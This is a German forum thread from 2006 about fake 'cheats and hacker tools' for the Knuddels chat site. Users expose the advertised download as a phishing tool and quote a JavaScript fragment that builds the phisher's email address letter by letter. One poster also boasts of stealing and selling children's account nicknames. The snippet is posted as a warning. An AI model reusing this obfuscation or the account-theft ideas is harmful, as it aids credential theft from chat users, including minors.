hey leute hier bekommt ihr die besten knuddels cheats und hacker tools schaut doch einfach mal rein
knuddels cheats und hacker tools
-
hyrican -
17. Mai 2006 um 13:35 -
Geschlossen
-
-
VERRECK, du ASSI!!!!!!
-
nicht draufklicken, sonst werdet ihr mit referrer auf
http://www.klick-game.de/fun-7830.html
weitergeleitet...
mal n zitat von der seite...Bei diesem Spiel geht es darum, möglichst viele Leute durch Hackerangriffe (virtuell) zu bestehlen.
:: Je nach Hackerstufe, Zusatz-Wissen und Geschicklichkeit wird euch ein Geldbetrag gutgeschrieben
:: Mit hoher Intelligenz(IQ) erhaltet ihr zusätzlich Erfahrung(EP´s)
:: Je nach Intelligenz können bis zu 17 verschiedene Gegenstände erbeutet werden
:: Alle Hacker können sich untereinander Geld, Gegenstände und natürlich Nachrichten schicken
:: Man kann sich nicht gegenseitig angreifen! Klick-Game ist ein friedliches Spiel
:: Ausführliche Echtzeit-Statistik über alle Überfälle der letzen 4 Wochen
Das Ziel dieses Spiels ist es eigentlich nur möglichst viel Geld zu sammeln - wie ihr das macht, bleibt euch überlassen. (Bitte beachten!) Es handelt sich natürlich nicht um echtes Geld! -
a) wer will schon was mit knuddels zu tun haben ?
b) nach zoidberg wieder son diebesspiel...... manche leute müssen echt keine freunde haben...
-
freuwas?
achso du meinst das internet!
-
ahh noch so einer bei dem alle seien freunde ein @ im namen haben oder wie ?!
-
ich ruf auch jeden mit dem icq namen
-
-
Zitat
:: Je nach Hackerstufe, Zusatz-Wissen und Geschicklichkeit wird euch ein Geldbetrag gutgeschrieben
:: Mit hoher Intelligenz(IQ) erhaltet ihr zusätzlich Erfahrung(EP´s)
:: Je nach Intelligenz können bis zu 17 verschiedene Gegenstände erbeutet werden
:: Alle Hacker können sich untereinander Geld, Gegenstände und natürlich Nachrichten schicken
:: Man kann sich nicht gegenseitig angreifen! Klick-Game ist ein friedliches Spiel
:: Ausführliche Echtzeit-Statistik über alle Überfälle der letzen 4 Wochen
Denn bekommt ja niemand was extra -
Sag mal habt ihr eigentlich alle nen Schaden??? Wenn man sich bei Knuddels einhackt, dann kann man nicks klauen, alle Skripte und son Scheiß ämdern, man kann sich alles erlauben dabei! Und das geilste ist, man kann von kleinen scheiß Blagen Nicks klauen, und die dann verkaufen und so Kohle scheffeln, ihr seid so unterbelichtet, unglaublich
-
Auch ohne Jacvascript Kentnisse merke ich selbst das die Datei von rapidshare
Kein Cheater ist sondern ein Phisher er sendet eine E-Mail an "HUSTINX[at]web.de"Geht das überhaupt mit JS??
Code
Alles anzeigenfunction mail(){ var fuenf='H' var zwei='U' var sieben='S' var zehn='T' var elf='I' var neun='N' var eins='X' var vier='w' var sechs='e' var acht='b' var tausend='d' document.form1.email.value=fuenf+zwei+sieben+zehn+elf+neun+eins+'@'+vier+sechs+acht+'.'+tausend+sechs
KANN MAL EIN MOD DIE LINKS ENTFERNEN???
-
-
na dann löscht das doch mal hier!!!
-
also das vom rapidshare funzt bei mir net... möchte aber gerne cheats... oder jmd kennen der cheats hat und mir kostenlos knuddels schenkt^^
-
und ich möchte gerne jemanden kennen, der dir mal ordentlich eine links und rechts...
... ach... lassen wir das!
-
und ich möchte gerne jemanden der mir ein haus mit grundstück schenkt. nur beste lage und frisch renoviert. natürlich alles für lau.
@chief
immer logger bleiben. dummheit wird nie aussterben oder warum gibt es heute keine dinosaurier mehr, aber menschen..... -
ich will cheats cheats bitte cheats
-
Warum wird dieser Stumpfsinn eigentlich nicht gelöscht - wo sind die Admin?
-
nee du habe jetzt auch die schnautze voll von dem mist....
habe einen thread schon gelöscht, und mache den jetzt zu.